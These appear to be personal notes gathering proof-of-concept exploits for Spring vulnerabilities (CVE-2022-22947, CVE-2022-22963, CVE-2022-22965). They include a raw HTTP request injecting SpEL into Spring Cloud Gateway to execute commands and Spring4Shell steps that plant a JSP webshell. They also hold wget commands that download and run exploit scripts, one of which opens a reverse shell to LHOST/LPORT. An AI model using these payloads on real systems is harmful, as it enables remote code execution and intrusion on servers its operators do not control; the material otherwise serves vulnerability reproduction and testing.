Cloud Gateway RCE - CVE-2022-22947

References:

<https://tanzu.vmware.com/security/cve-2022-22947>
<https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/>

POC

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329
{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"
    }
  }],
  "uri": "<http://example.com>"
}

Untitled

The CVE-2022-22947 RCE is a github repository by shakeman8

Untitled

Spring4Shell - Proof Of Concept | Information

CVE-2022-22963 & CVE-2022-22965

Found intresting poc here : https://github.com/craig/SpringCore0day/blob/main/exp.py & https://twitter.com/vxunderground/status/1509170582469943303

clone sample repo from https://spring.io/guides/gs/handling-form-submission/ you can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy). build war file :) install tomcat9 + java 11 (i did it on ubuntu 20.04 via apt-get) deploy the war file update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url http://your.ip.here:8080/handling-form-submission-complete/greeting you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission hit http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id to see the results

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

wget <https://raw.githubusercontent.com/chaosec2021/Spring-cloud-function-SpEL-RCE/main/Spel_RCE_POC.py>; chmod +x Spel_RCE_POC.py;
**python3 Spel_RCE_POC.py url.txt**

<https://raw.githubusercontent.com/chaosec2021/Spring-cloud-function-SpEL-RCE/main/Spel_RCE_Bash_EXP.py>; chmod +x Spel_RCE_Bash_EXP.py;
**python3 Spel_RCE_Bash_EXP.py** <http://URL> LHOST LPORT